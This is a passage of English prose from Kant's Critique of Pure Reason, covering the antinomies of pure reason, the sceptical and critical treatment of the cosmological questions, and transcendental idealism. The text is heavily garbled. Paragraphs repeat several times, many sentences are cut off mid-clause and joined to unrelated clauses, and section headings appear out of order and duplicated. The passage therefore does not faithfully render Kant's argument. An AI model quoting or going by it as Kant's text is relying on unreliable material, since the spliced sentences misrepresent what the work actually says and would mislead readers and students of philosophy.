The obligation of an at least critical solution of the questions which reason thus propounds to itself, we cannot, therefore, escape by complaints of the narrow limits of our reason, and by confessing, under the pretext of a humility based on self-knowledge, that it is beyond the power of our reason to determine whether the world exists from eternity or has a beginning; whether cosmical space is filled with beings to infinitude, or is enclosed within certain limits; whether anything in the world is simple, or everything such as to be infinitely divisible; whether there is generation and production through freedom, or whether everything depends on the chain of events in the natural order; and finally whether there exists any being completely unconditioned and necessary in itself, or whether everything depends on the chain of events in the natural order; and finally whether there exists any being completely unconditioned and necessary in itself, or whether everything is conditioned, an unconditioned and first existence being nowhere discernible. Since, therefore, the antithesis thus refuses to admit as first or as a beginning anything that could serve as a foundation for building, a complete edifice of knowledge is, on such assumptions, altogether impossible. Thus the architectonic interest of reason — the demand not for empirical but for pure a priori unity of reason — forms a natural recommendation for the assertions of the antithesis we observe a perfect uniformity in manner of thinking and complete unity of maxims, namely a principle of pure empiricism, applied not only in explanation of the appearances within the world, but also in the solution of the transcendental ideas of the world itself, in its totality. The assertions of the thesis.

If men could free themselves from all such interests, and consider the assertions of reason irrespective of their consequences, solely in view of the intrinsic force of their grounds, and were the only way of escape from their perplexities to give adhesion to one or other of the opposing parties. The raising of this question, how we should proceed if we consulted only our interest and not the logical criterion of truth, will decide nothing in regard to the contested rights of the two parties, but has this advantage, that it enables us to comprehend why the participants in this quarrel, though not influenced by any superior insight into the matter under dispute, have preferred to fight on one side rather than on the other. It will also cast light on a number of incidental points, for instance, the passionate zeal of the one party and the calm assurance of the other; and will explain why the world hails the one with eager approval, and is implacably prejudiced against the other.

Comparison of the principles which form the starting-points of the two parties is what enables us, as we shall find, to determine the standpoint from which alone this preliminary enquiry can be carried out with the required thoroughness. In the assertions of the thesis.

If men could free themselves from all such interests, and consider the assertions of reason irrespective of their consequences, solely in view of the intrinsic force of their grounds, and were the only way of escape from their perplexities to give adhesion to one or other of the opposing parties, their state would be one of continuous vacillation. To-day it would be their conviction that the human will is free; tomorrow, dwelling in reflection upon the indissoluble chain of nature, they would hold that freedom is nothing but self-deception, that everything is simply nature. If, however, they were summoned to action, this play of the merely speculative reason would, like a dream, at once cease, and they would choose their principles exclusively in accordance with practical interests. Since, however, it is fitting that a reflective and enquiring being should devote a certain amount of time to the examination of his own reason, entirely divesting himself of all partiality and openly submitting his observations to the judgment of others, no one can be blamed for, much less prohibited from, presenting for trial the two opposing parties, leaving them, terrorised by no threats, to defend themselves as best they can, before a jury of like standing with themselves, that is, before a jury of fallible men.
§ 4
THE ABSOLUTE NECESSITY OF A SOLUTION OF THE TRANSCENDENTAL PROBLEMS OF PURE REASON

To profess to solve all problems and to answer all questions would be impudent boasting, and would argue such extravagant self-conceit as at once to forfeit all confidence. Nevertheless there are sciences the very nature of which requires that every question arising within their domain should be completely answerable in terms of what is known, inasmuch as the answer must issue from the same sources from which the question proceeds. In these sciences it is not permissible to plead unavoidable ignorance, or of the problem's unfathomable depth, can release us from the obligation to answer it thoroughly and completely. That very concept which puts us in a position to ask the question must also qualify us to answer it, since, as in the case of right and wrong, the object is not to be met with outside the concept.

In transcendental philosophy, there are two pure rational sciences, one purely speculative, the other with a practical content, namely, pure mathematics and pure ethics. Has it ever been suggested that, because of our necessary ignorance of the conditions, it must remain uncertain what exact relation, in rational or irrational numbers, a diameter bears to a circle? Since no adequate solution in terms of rational numbers is possible, and no solution in terms of irrational numbers has yet been discovered, it was concluded that at least the impossibility of a solution can be known with certainty, and of this impossibility Lambert has given the required proof. In the universal principles of morals nothing can be uncertain, because the principles are either altogether void and meaningless, or must be derived from the concepts of our reason. In natural science, on the other hand, there is endless conjecture, and certainty is not to be counted upon. For the natural appearances are objects which are given to us independently of our concepts, and the key to them lies not in us and our pure thinking, but outside us; and therefore in many cases, since the key is not to be found, an assured solution is not to be expected. I am not, of course, here referring to those questions of the Transcendental Analytic which concern the deduction of our pure knowledge; we are at present treating only of the certainty of judgments with respect to their objects and not with respect to the source of our concepts themselves.

The obligation of an at least critical solution of the questions which reason thus propounds to itself, we cannot, therefore, escape by complaints of the narrow limits of our reason, and by confessing, under the pretext of a humility based on self-knowledge, that it is beyond the power of our reason to determine whether this unconditioned is to be located in an absolute beginning of synthesis, or in an absolute totality of a series that has no beginning.

In its empirical meaning, the term 'whole' is always only comparative. The absolute whole of quantity (the universe), the whole of division, of derivation, of the condition of existence in general, with all questions as to whether it is brought about through finite synthesis or through a synthesis requiring infinite extension, have nothing to do with any possible experience.

We should not, for instance, in any wise be able to explain the appearances of a body better, or even differently, in assuming that it consisted either of simple or of inexhaustibly composite parts; for neither a simple appearance nor an infinite composition can ever come before us. Appearances demand explanation only so far as the conditions of their explanation are given in perception; but all that may ever be given in this way, when taken together in an absolute whole, is not itself a perception. Yet it is just the explanation of this very whole that is demanded in the transcendental problems of reason.

Thus the solution of these problems can never be found in experience, and this is precisely the reason why we should not say that it is uncertain what should be ascribed to the object [of our idea]. For as our object is only in our brain, and cannot be given outside it, we have only to take care to be at one with ourselves, and to avoid that amphiboly which transforms our idea into a supposed representation of an object that is empirically given and therefore to be known according to the laws of experience. The dogmatic solution is therefore not only uncertain, but impossible. The critical solution, which allows of complete certainty, does not consider the question objectively, but in relation to the foundation of the knowledge upon which the question is based.
§ 5
SCEPTICAL REPRESENTATION OF THE COSMOLOGICAL QUESTIONS IN THE FOUR TRANSCENDENTAL IDEAS

We should of ourselves desist from the demand that our questions be answered dogmatically, if from the start we understood that whatever the dogmatic answer might turn out to be it would only increase our ignorance, and cast us from one inconceivability into another, from one obscurity into another still greater, and perhaps even into contradictions. If our question is directed simply to a yes or no, we are well advised to leave aside the supposed grounds of the answer, and first consider what we should gain according as the answer is in the affirmative or in the negative. Should we then find that in both cases the outcome is mere nonsense, there will be good reason for instituting a critical examination of our question, to determine whether the question does not itself rest on a groundless presupposition, in that it plays with an idea the falsity of which can be more easily detected through study of its application and consequences than in its own separate representation.

This is the great utility of the sceptical mode of dealing with the questions which pure reason puts to pure reason. By its means we can deliver ourselves, at but a small cost, from a great body of sterile dogmatism, and set in its place a sober critique, which as a true cathartic will effectively guard us against such groundless beliefs and the supposed polymathy to which they lead.

If therefore, in dealing with a cosmological idea, I were able to appreciate beforehand that whatever view may be taken of the unconditioned in the successive synthesis of appearances, it must either be too large or too small for that to which it is directed, namely, possible experience. Why have we not expressed ourselves in the opposite manner, saying that in the former case the empirical concept is always too small for the idea, and in the latter too large, and that the blame therefore attaches to the empirical regress? The reason is this. Possible experience is that which can alone give reality to our concepts; in its absence a concept is a mere idea, without truth, that is, without relation to any object. The possible empirical concept is therefore the standard by which we must judge whether the idea is a mere idea and thought-entity, or whether it finds its object in the world. For we can say of anything that it is too large or too small relatively to something else, only if the former is required for the sake of the latter, and has to be adapted to it.

Among the puzzles propounded in the ancient dialectical Schools was the question, whether, if a ball cannot pass through a hole, we should say that the ball is too large or the hole too small. In such a case it is a matter of indifference whether I say that in the empirical advance in space I can meet with stars a hundred times farther removed than the outermost now perceptible to me, or whether I say that they are perhaps to be met with in cosmical space even though no human being has ever perceived them, must certainly be admitted. This, however, only means that in the possible advance of experience.

Nothing is really given us save perception and the empirical advance from this to other possible perceptions. For the appearances, as mere representations, only in such a possible experience are they given. To say that they exist prior to all my experience is only to assert that they are to be met with if, starting from perception, I advance to that part of experience to which they belong. The cause of the empirical conditions of this advance (that which determines what members I shall meet with, or how far I can meet with any such in my regress) is transcendental, and is therefore necessarily unknown to me. We are not, however, concerned with this transcendental cause, but only with the rule of the advance in the experience in which objects, that is to say, appearances, are given to me. Moreover, in outcome it is a matter of indifference whether I say that in the empirical advance in space I can meet with stars a hundred times farther removed than the outermost now perceptible to me, or whether I say that they are perhaps to be met with in cosmical space even though no human being has ever perceived or ever will perceive them. For even supposing they were given as things in themselves, without relation to possible experience, it still remains true that they are nothing to me, and therefore are not objects, save in so far as they are contained in the series of the empirical regress. Only in another sort of relation, when these appearances would be used for the cosmological idea of an absolute whole, and when, therefore, we are dealing with a question which oversteps the limits of possible experience, does distinction of the mode in which we view the reality of those objects of the senses become of importance, as serving to guard us against a deceptive error which is bound to arise if we misinterpret our empirical concepts.
§ 7
CRITICAL SOLUTION OF THE COSMOLOGICAL QUESTIONS IN THE FOUR TRANSCENDENTAL IDEAS

We should of ourselves desist from the demand that our questions be answered dogmatically, if from the start we understood that whatever the dogmatic answer might turn out to be it would only increase our ignorance, and cast us from one inconceivability into another, from one obscurity into another still greater, and perhaps even into contradictions. If our question is directed simply to a yes or no, we are well advised to leave aside the supposed grounds of the answer, and first consider what we should gain according as the answer is in the affirmative or in the negative. Should we then find that in both cases the outcome is mere nonsense, there will be good reason for instituting a critical examination of our question, to determine whether the question does not itself rest on a groundless presupposition, in that it plays with an idea the falsity of which can be more easily detected through study of its application and consequences than in its own separate representation.

This is the great utility of the sceptical mode of dealing with the questions which pure reason puts to pure reason. By its means we can deliver ourselves, at but a small cost, from a great body of sterile dogmatism, and set in its place a sober critique, which as a true cathartic will effectively guard us against such groundless beliefs and the supposed polymathy to which they lead.

If therefore, in dealing with a cosmological idea, I were able to appreciate beforehand that whatever view may be taken of the unconditioned in the successive synthesis of appearances, it must either be too large or too small for any concept of the understanding, it must be entirely empty and without meaning; for its object, view it as we may, cannot be made to agree with it. This is in fact the case with all cosmical concepts; and this is why reason, so long as it holds to them, is involved in an unavoidable antinomy. For suppose: —

First, that the world has no beginning: it is then too large for our concept; while if the division of space is to stop at any member of the division (the simple), the regress will be too small for the idea of the unconditioned. For this member always still allows of a regress to further parts contained in it.

Thirdly, if we suppose that nothing happens in the world save in accordance with the laws of nature, the causality of the cause will always itself be something that happens, making necessary a regress to a still higher cause, and thus a continuation of the series of conditions a parte priori without end. Nature, as working always through efficient causes, is thus too large for any of the concepts which we can employ in the synthesis of appearances) that constitute a series. The ideas postulate absolute totality of these series; and thereby they set reason in unavoidable conflict with itself. We shall be in a better position to detect what is deceptive in this pseudo-rational argument, if we first correct and define some of the concepts employed in it.

In the first place, it is evident beyond all possibility of doubt, that if the conditioned is given, the entire series of all its conditions is likewise given; objects of the senses are given as conditioned; therefore, etc. Through this syllogism, the major premise of which appears so natural and evident, as many cosmological ideas are introduced as there are differences in the conditions (in the synthesis of appearances) that constitute a series. The ideas postulate absolute totality of these series; and thereby they set reason in unavoidable conflict with itself. We shall be in a better position to detect what is deceptive in this pseudo-rational argument, if we first correct and define some of the concepts employed in it.

In the first place, it is evident beyond all possibility of doubt, that if the conditioned is given, all its conditions (as appearances) are likewise given, and therefore cannot in any way infer the absolute totality of these series; and thereby they set reason in unavoidable conflict with itself. We shall be in a better position to detect what is deceptive in this pseudo-rational argument, if we first correct and define some of the concepts employed in it.

In the first place, it is evident beyond all possibility of doubt, that if the conditioned is given, the entire series of all its conditions is set us as a task. For it is involved in the very concept of the conditioned that something is referred to a condition, and if this condition is again itself conditioned, to a more remote condition, and so through all the members of the series. The above proposition is thus analytic, and has nothing to fear from a transcendental criticism. It is a logical postulate of reason, that through the understanding we follow up and extend as far as possible that connection of a concept with its conditions which directly results from the concept itself.

Further, if the conditioned as well as its condition are things in themselves, then upon the former being given, the regress to the latter is not only set as a task, but therewith already really given. And since this holds of all members of the series, the complete series of the conditions in appearance, as subsumed in the minor premise, is necessarily successive, the members of the series being given only as following upon one another in time; and I have therefore, in this case, no right to assume the absolute totality of the series of its conditions. The appearances are in their apprehension themselves nothing but an empirical synthesis in space and time is an appearance; it is not anything in itself but consists merely of representations, which, if not given in us -that is to say, in perception — are nowhere to be met with.

The faculty of sensible intuition is strictly only a receptivity, a capacity of being affected in a certain manner with representations, the relation of which to one another is a pure intuition of space and of time (mere forms of our sensibility), and which, in so far as they are contained in the series of the empirical regress. Only in another sort of relation, when these appearances would be used for the cosmological idea of an absolute whole, and when, therefore, we are dealing with a question which oversteps the limits of possible experience, does distinction of the mode in which we view the reality of those objects of the senses become of importance, as serving to guard us against a deceptive error which is bound to arise if we misinterpret our empirical concepts.
§ 7
CRITICAL SOLUTION OF THE COSMOLOGICAL QUESTIONS IN THE FOUR TRANSCENDENTAL IDEAS

We should of ourselves desist from the demand that our questions be answered dogmatically, if from the start we understood that whatever the dogmatic answer might turn out to be it would only increase our ignorance, and cast us from one inconceivability into another, from one obscurity into another still greater, and perhaps even into contradictions. If our question is directed simply to a yes or no, we are well advised to leave aside the supposed grounds of the answer, and first consider what we should gain according as the answer is in the affirmative or in the negative. Should we then find that in both cases the outcome is mere nonsense, there will be good reason for instituting a critical examination of our question, to determine whether the world exists from eternity or has a beginning; whether cosmical space is filled with beings to infinitude, or is enclosed within certain limits; whether anything in the world is simple, or everything such as to be infinitely divisible; whether there is generation and production through freedom, or whether everything depends on the chain of events in the natural order; and finally whether there exists any being completely unconditioned and necessary in itself, or whether everything is conditioned in its existence and therefore dependent on external things and itself contingent. All these questions refer to an object which can be found nowhere save in our thoughts, namely, to the absolutely unconditioned totality of the synthesis of appearances. If from our own concepts we are unable to assert and determine anything certain, we must not throw the blame upon the object as concealing itself from us. Since such an object is nowhere to be met with outside our idea, it is not possible for it to be given. The cause of failure we must seek in our idea itself. For so long as we obstinately persist in assuming that there is an actual object corresponding to the idea, the problem, as thus viewed, allows of no solution. A clear exposition of the dialectic which lies within our concept itself would soon yield us complete certainty how we ought to judge in reference to such a question.

The pretext that we are unable to obtain certainty in regard to these problems can be at once met with the following question which certainly calls for a clear answer: Whence come those ideas, the solution of which involves us in such difficulty? Is it, perchance, appearances that demand explanation, and do we, in accordance with these ideas, have to seek only the principles or rules of their exposition? Even if we suppose the whole of nature to be spread out before us, and that of all that is presented to our intuition nothing is concealed from our senses and consciousness, yet still through no experience could the object of our ideas be known by us in concreto. For that purpose, in addition to this exhaustive intuition, we should require what is not possible through any empirical knowledge, namely, a completed synthesis and the consciousness of its absolute totality. Accordingly our question does not require to be raised in the explanation of any given appearance, and is therefore not a question which can be regarded as imposed on us by the object itself. The object can never come before us, since it cannot be given through any possible experience. In all possible perceptions we always remain involved in conditions, whether in space or in time, and come upon nothing unconditioned requiring us to determine whether this unconditioned is to be located in an absolute beginning of synthesis, or in an absolute totality of a series that has no beginning.

In its empirical meaning, the term 'whole' is always only comparative. The absolute whole of quantity (the universe), the whole of division, of derivation, of the condition of existence in general, with all questions as to whether it is brought about through finite synthesis or through a synthesis requiring infinite extension, have nothing to do with any possible experience.

We should not, for instance, in any wise be able to explain the appearances of a body better, or even differently, in assuming that it consisted either of simple or of inexhaustibly composite parts; for neither a simple appearance nor an infinite composition can ever come before us. Appearances demand explanation only so far as the conditions of their explanation are given in perception; but all that may ever be given in this way, when taken together in an absolute whole, is not itself a perception. Yet it is just the explanation of this very whole that is demanded in the transcendental problems of reason.

Thus the solution of these problems can never be found in experience, and this is precisely the reason why we should not say that it is uncertain what should be ascribed to the object [of our idea]. For as our object is only in our brain, and cannot be given outside it, we have only to take care to be at one with ourselves, and to avoid that amphiboly which transforms our idea into a supposed representation of an object that is empirically given and therefore to be known according to the laws of experience. The dogmatic solution is therefore not only uncertain, but impossible. The critical solution, which allows of complete certainty, does not consider the question objectively, but in relation to the foundation of the knowledge upon which the question is based.
§ 5
SCEPTICAL REPRESENTATION OF THE COSMOLOGICAL QUESTIONS IN THE FOUR TRANSCENDENTAL IDEAS

We should of ourselves desist from the demand that our questions be answered dogmatically, if from the start we understood that whatever the dogmatic answer might turn out to be it would only increase our ignorance, and cast us from one inconceivability into another, from one obscurity into another still greater, and perhaps even into contradictions. If our question is directed simply to a yes or no, we are well advised to leave aside the supposed grounds of the answer, and first consider what we should gain according as the answer is in the affirmative or in the negative. Should we then find that in both cases the outcome is mere nonsense, there will be good reason for instituting a critical examination of our question, to determine whether the question does not itself rest on a groundless presupposition, in that it plays with an idea the falsity of which can be more easily detected through study of its application and consequences than in its own separate representation.

This is the great utility of the sceptical mode of dealing with the questions which pure reason puts to pure reason. By its means we can deliver ourselves, at but a small cost, from a great body of sterile dogmatism, and set in its place a sober critique, which as a true cathartic will effectively guard us against such groundless beliefs and the supposed polymathy to which they lead.

If therefore, in dealing with a cosmological idea, I were able to appreciate beforehand that whatever view may be taken of the unconditioned in the successive synthesis of appearances, it must either be too large or too small for any concept of the understanding, I should be in a position to demand and expect none but assured answers to all the questions within its domain (quaestiones domesticae), although up to the present they have perhaps not been found. In addition to transcendental philosophy, there are two pure rational sciences, one purely speculative, the other with a practical content, namely, pure mathematics and pure ethics. Has it ever been suggested that, because of our necessary ignorance of the conditions, is enjoined or set as a task, and that in this regress there can be no lack of given conditions.

These considerations make it clear that the major premise of the cosmological inference takes the conditioned in the transcendental sense of a pure category, while the minor premise takes it in the empirical sense of a concept of the understanding, it must be entirely empty and without meaning; for its object, view it as we may, cannot be made to agree with it. This is in fact the case with all cosmical concepts; and this is why reason, so long as it holds to them, is involved in an unavoidable antinomy. For suppose: —

First, that the world has no beginning: it is then too large for our concept, which, consisting as it does in a successive regress, can never reach the whole eternity that has elapsed. Or suppose that the world has no beginning: it is then too large for our concept, which, consisting as it does in a successive regress, that idea of absolute totality which holds only as a condition of things in themselves. From this antinomy we can, however, obtain, not indeed a dogmatic, but a critical and doctrinal advantage. It affords indirect proof of the transcendental ideality of appearances — a proof which ought to convince any who may not be satisfied by the direct proof given in the Transcendental Aesthetic. This proof would consist in the following dilemma. If the world is a whole existing in itself, it is either finite or infinite. Being series of subordinated representations, they exist only in the dynamical regress, and prior to this regress can have no existence in themselves as self-subsistent series of things.

Thus the antinomy of pure reason rests upon the dialectical argument: If the conditioned is given, the entire series of all its conditions is likewise given; objects of the senses are given as conditioned; therefore, etc. Through this syllogism, the major premise of the cosmological inference takes the conditioned in the transcendental sense of a pure category, while the minor premise takes it in the empirical sense of a concept of the understanding, it must be entirely empty and without meaning; for its object, view it as we may, cannot be made to agree with it. This is in fact the case with all cosmical concepts; and this is why reason, so long as it holds to them, is involved in an unavoidable antinomy. For suppose: —

First, that the world has no beginning: it is then too large for our concept; while if the division of space is to stop at any member of the division (the simple), the regress will be too small for the idea of the unconditioned. For this member always still allows of a regress to further parts contained in it.

Thirdly, if we suppose that nothing happens in the world save in accordance with the laws of nature, the causality of the cause will always itself be something that happens, making necessary a regress to a still higher cause, and thus a continuation of the series of conditions a parte priori without end. Nature, as working always through efficient causes, is thus too large for any of the concepts which we can employ in the synthesis of cosmical events.

If, in certain cases, we admit the occurrence of self-caused events, that is, generation through freedom, then by an unavoidable law of nature the question 'why' still pursues us, constraining us, in accordance with the law of causality which governs experience, to pass beyond such events; and we thus find that such totality of connection is too small for our concept. For we are constrained always still to look about for some other existence upon which it is dependent.

We have said that in all these cases the cosmical idea is either too large or too small for the empirical regress, and therefore for any possible concept of the understanding, I should be in a position to understand that since the cosmological ideas, and with them all the mutually conflicting pseudo-rational assertions, may perhaps rest on an empty and merely fictitious concept of the manner in which they are represented, as extended beings, or as series of alterations, have no independent existence outside our thoughts. This doctrine I entitle transcendental idealism. [I have also, elsewhere, sometimes entitled it formal idealism, to distinguish it from material idealism, that is, from the usual type of idealism which doubts or denies the existence of outer things themselves.] The realist, in the transcendental meaning of this term, treats these modifications of our sensibility as self-subsistent things, that is, treats mere representations as things in themselves.

It would be unjust to ascribe to us that long-decried empirical idealism, which, while it admits the genuine reality of space, denies the existence of the extended beings in it, or at least considers their existence doubtful, and so does not in this regard allow of any properly demonstrable distinction between truth and dreams. As to the appearances of inner sense in time, empirical idealism finds no difficulty in regarding them as real things; indeed it even asserts that this inner experience is the sufficient as well as the only proof of the actual existence of its object (in itself, with all this time-determination).

Our transcendental idealism, on the contrary, admits the reality of the objects of outer intuition, as intuited in space, and of all changes in time, as represented by inner sense. For since space is a form of that intuition which we entitle outer, and since without objects in space there would be no empirical representation whatsoever, we can and must regard the extended beings in it as real; and the same is true of time. But this space and this time, and with them all appearances, are not in themselves things; they are nothing but representations, and cannot exist outside our mind. Even the inner and sensible intuition of our mind (as object of consciousness) which is represented as being determined by the succession of different states in time, is not the self proper, as it exists in itself — that is, is not the transcendental subject — but only an appearance that has been given to the sensibility of this, to us unknown, being.

This inner appearance cannot be admitted to exist in any such manner in and by itself; for it is conditioned by time, and time cannot be a determination of a thing in itself. The empirical truth of appearances in space and time is, however, sufficiently secured; it is adequately distinguished from dreams, if both dreams and genuine appearances cohere truly and completely in one experience, in accordance with empirical laws.

The objects of experience, then, are never given in themselves, but only in experience, and have no existence outside it. That there may be inhabitants in the moon, although no one has ever perceived them, must certainly be admitted. This, however, only means that in the possible advance of experience we may encounter them. For everything is real which stands in connection with a perception in accordance with the laws of nature, the causality of the cause will always itself be something that happens, making necessary a regress to a still higher cause, and thus a continuation of the series of conditions a parte priori without end. Nature, as working always through efficient causes, is thus too large for any of the concepts which we can employ in the synthesis of cosmical events.

If, in certain cases, we admit the occurrence of self-caused events, that is, generation through freedom, then by an unavoidable law of nature the question 'why' still pursues us, constraining us, in accordance with the law of causality which governs experience, to pass beyond such events; and we thus find that such totality of connection is too small for our necessary empirical concept.

Fourthly, if we admit an absolutely necessary being (whether it be the world itself, or something in the world, or the cause of the world), we set it in a time infinitely remote from any given point of time, because otherwise it would be dependent upon another and antecedent being. But such an existence is then too large for our empirical concept, and is unapproachable through any regress, however far this be carried.

If, again, we hold that everything belonging to the world (whether as conditioned or as condition) is contingent, any and every given existence is too small for our concept.

Secondly, if every appearance in space (matter) consists of infinitely many parts, the regress in the division will always be too large for our concept; while if the division of space is to stop at any member of the division (the simple), the regress will be too small for the idea of the unconditioned. For this member always still allows of a regress to further parts contained in it.

Thirdly, if we suppose that nothing happens in the world save in accordance with the laws of nature, the causality of the cause will always itself be something that happens, making necessary a regress to a still higher cause, and thus a continuation of the series of conditions a parte priori without end. Nature, as working always through efficient causes, is thus too large for any of the concepts which we can employ in the synthesis of cosmical events.

If, in certain cases, we admit the occurrence of self-caused events, that is, generation through freedom, then by an unavoidable law of nature the question 'why' still pursues us, constraining us, in accordance with the law of causality which governs experience, to pass beyond such events; and we thus find that such totality of connection is too small for our necessary empirical concept.

Fourthly, if we admit an absolutely necessary being (whether it be the world itself, or something in the world, or the cause of the world), we set it in a time infinitely remote from any given point of time, because otherwise it would be dependent upon another and antecedent being. But such an existence is then too large for our empirical concept, and is unapproachable through any regress, however far this be carried.

If, again, we hold that everything belonging to the world (whether as conditioned or as condition) is contingent, any and every given existence is too small for our concept. For we are constrained always still to look about for some other existence upon which it is dependent.

We have said that in all these cases the cosmical idea is either too large or too small for the empirical regress, and therefore for any possible concept of the understanding, it must be entirely empty and without meaning; for its object, view it as we may, cannot be made to agree with it. This is in fact the case with all cosmical concepts; and this is why reason, so long as it holds to them, is involved in an unavoidable antinomy. For suppose: —

First, that the world has no beginning: it is then too large for our concept, which, consisting as it does in a successive regress, can never reach the whole eternity that has elapsed. Or suppose that the world has a beginning, that my thinking self is of simple and therefore indestructible nature, that it is free in its voluntary actions and raised above the compulsion of nature, and finally that all order in the things constituting the world is due to a primordial being, from which everything derives its unity and purposive connection — these are so many foundation stones of morals and religion. The antithesis robs us of all these supports, or at least appears to do so.

Secondly, reason has a speculative interest on the side of the thesis. When the transcendental ideas of the world itself, in its totality. The assertions of the thesis, on the other hand, pre-suppose, in addition to the empirical mode of explanation employed within the series of appearances, intelligible beginnings; and to this extent its maxim is complex. But as its essential and distinguishing characteristic is the presupposition of intelligible beginnings, I shall entitle it the dogmatism of pure reason.

In the determination of the cosmological ideas we find on the side of empiricism, that is, of the antithesis: first, no such practical interest (due to pure principles of reason) as is provided for the thesis by morals and religion. On the contrary, pure empiricism appears to deprive them of all power and influence. If there is no primordial being distinct from the world, if the world is without beginning and therefore without an Author, if our will is not free, and the soul is divisible and perishable like matter, moral ideas and principles lose all validity, and share in the fate of the transcendental ideas which served as their theoretical support.

But secondly, in compensation, empiricism yields advantages to the speculative interest of reason, which are very attractive and far surpass those which dogmatic teaching bearing on the ideas of reason can offer. According to the principle of empiricism the understanding is always on its own proper ground, namely, the field of genuinely possible experiences, investigating their laws, and by means of these laws affording indefinite extension to the sure and comprehensible knowledge which it supplies. Here every object, both in itself and in its relations, can and ought to be represented in intuition, or at least in concepts for which the corresponding images can be clearly and distinctly provided in given similar intuitions. There is no necessity to leave the chain of the natural order and to resort to ideas, the objects of which are not known, because, as mere thought-entities, they can never be given. Indeed, the understanding is always on its own proper ground, namely, the field of genuinely possible experiences, investigating their laws, and by means of these laws affording indefinite extension to the sure and comprehensible knowledge which it supplies. Here every object, both in itself and in its relations, can and ought to be represented in intuition, or at least in concepts for which the corresponding images can be clearly and distinctly provided in given similar intuitions. There is no necessity to leave the chain of the natural order and to resort to ideas, the objects of which are not known, because, as mere thought-entities, they can never be given. Indeed, the understanding is not permitted to leave its proper business, and under the pretence of having brought it to completion to pass over into the sphere of idealising reason and of transcendent concepts — a sphere in which it is no longer necessary for it to observe and investigate in accordance with the laws of empirical advance. They are therefore real if they stand in an empirical connection with my actual consciousness, although they are not for that reason real in themselves, that is, outside this advance of experience we may encounter them. For everything is real which stands in connection with a perception in accordance with the laws of nature, but only to think and to invent in the assurance that it cannot be refuted by the facts of nature, not being bound by the evidence which they yield, but presuming to pass them by or even to subordinate them to a higher authority, namely, that of pure reason.

The empiricist will never allow, therefore, that any epoch of nature is to be taken as the absolutely first, or that any limit of his insight into the extent of nature is to be regarded as the widest possible. Nor does he permit any transition from the objects of nature — which he can analyse through observation and mathematics, and synthetically determine in intuition (the extended) — to those which neither sense nor imagination can ever represent in concreto (the simple). Nor will he admit the legitimacy of assuming in nature itself any power that operates independently of the laws of nature (freedom), and so of encroaching upon the business of the understanding, which is that of investigating, according to necessary rules, the origin of appearances. And, lastly, he will not grant that a cause ought ever to be sought outside nature, in an original being. We know nothing but nature, since it alone can present objects to us and instruct us in regard to their laws.

If the empirical philosopher had no other purpose in propounding his antithesis than to subdue the rashness and presumption of those who so far misconstrue the true vocation of reason as to boast of insight and knowledge just where true insight and knowledge cease, and to represent as furthering speculative interests that which is valid only in relation to practical interests (in order, as may suit their convenience, to break the thread of physical enquiries, and then under the pretence of extending knowledge to fasten it to transcendental ideas, through which we really know only that we know nothing); if, I say, the empiricist were satisfied with this, his principle would be a maxim urging moderation in our pretensions, modesty in our assertions, and yet at the same time the greatest possible extension of our understanding, through the teacher fittingly assigned to us, namely, through experience. If such were our procedure, we should not be cut off from employing intellectual presuppositions and faith on behalf of our practical interest; only they could never be permitted to assume the title and dignity of science and rational insight. Knowledge, which as such is speculative, can have no other object than that supplied by experience; if we transcend the limits thus imposed, the synthesis which seeks, independently of experience, new species of knowledge, lacks that substratum of intuition upon which alone it can be exercised.

But when empiricism itself, as frequently happens, becomes dogmatic in its attitude towards ideas, and confidently denies whatever lies beyond the sphere of its intuitive knowledge, it betrays the same lack of modesty; and this is all the more reprehensible owing to the irreparable injury which is thereby caused to the practical interests of reason.

The contrast between the teaching of Epicurus and that of Plato is of this nature.

Each of the two types of philosophy says more than it knows. The former encourages and furthers knowledge, though to the prejudice of the practical; the latter supplies excellent practical principles, but it permits reason to indulge in ideal explanations of natural appearances, in regard to which a speculative knowledge is alone possible to us — to the neglect of physical investigation.

Finally, as regards the third factor which has to be considered in a preliminary choice between the two conflicting parties, it is extremely surprising that empiricism should be so universally unpopular. The common understanding, it might be supposed, would eagerly adopt a programme which promises to satisfy it through exclusively empirical knowledge and the rational connections there revealed — in preference to the transcendental dogmatism which compels it to rise to concepts far outstripping the insight and rational faculties of the most practised thinkers. But this is precisely what commends such dogmatism to the common understanding, indeed, all speculative interests pale before the practical; and it imagines that it comprehends and knows what its fears or hopes incite it to assume or to believe.

Thus empiricism is entirely devoid of the popularity of transcendentally idealising reason; and however prejudicial such empiricism may be to the highest practical principles, there is no need to fear that it will ever pass the limits of the Schools, and acquire any considerable influence in the general life or any real favour among the multitude.

Human reason is by nature architectonic. That is to say, it regards all our knowledge as belonging to a possible system, and therefore allows only such principles as do not at any rate make it impossible for any knowledge that we may attain to combine into a system with other knowledge. But the propositions of the antithesis are of such a kind that they render the completion of the edifice of knowledge quite impossible. They maintain that there is always to be found beyond every state of the world a more ancient state, in every part yet other parts similarly divisible, prior to every event still another event which itself again is likewise generated, and that in existence in general everything is conditioned, an unconditioned and first existence being nowhere discernible. Since, therefore, the antithesis thus refuses to admit as first or as a beginning anything that could serve as a foundation for building, a complete edifice of knowledge is, on such assumptions, altogether impossible. Thus the architectonic interest of reason — the demand not for empirical but for pure a priori unity of reason — forms a natural recommendation for the assertions of the thesis, on the other hand, that is, the series of the conditions in appearance, as subsumed in the minor premise, is necessarily successive, the members of the series being given only as following upon one another in time; and I have therefore, in this case, no right to assume the absolute totality of magnitude in the [field of] appearance viewed as a thing given in and by itself, prior to all regress. We must therefore say that the number of parts in a given appearance is in itself neither finite nor infinite. For an appearance is not something existing in itself, and its parts are first given in and through the regress of the decomposing synthesis, a regress which is never given in absolute completeness, either as finite or as infinite. This also holds of the series of subordinated causes, and of the series that proceeds from the conditioned to unconditioned necessary existence. These series can never be regarded as being in themselves in their totality either finite or infinite. Being series of subordinated representations, they exist only in the dynamical regress, and prior to this regress can have no existence in themselves as self-subsistent series of things.

